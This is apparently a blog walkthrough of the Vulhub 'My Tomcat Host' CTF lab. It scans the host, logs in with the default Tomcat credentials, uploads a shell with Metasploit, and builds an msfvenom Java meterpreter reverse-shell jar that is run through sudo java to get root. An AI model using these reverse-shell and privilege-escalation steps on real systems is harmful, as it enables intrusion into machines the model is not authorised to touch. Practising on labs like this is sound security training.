Vulhub – My Tomcat Host Walkthrough

Scanning the host with nmap –A –T4 –p-

And with dirb

The page we can access it using the default credentials tomcat:tomcat

Ok now that we can login, we can use Msfconsole to upload a shell, use exploit/multi/http/tomcat_mgr_upload

Ok now running script gave me a lot of informations:

We’re going to create a jar exploit like this :

msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=3333 -f raw -o exploit.jar

Then transfer the file to the target and we rung this command:

sudo /usr/lib/jvm/java-1.8.0-openjdk- -jar exploit.jar

And we get a shell as root

Navigate to the root folder and catch the flag:

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s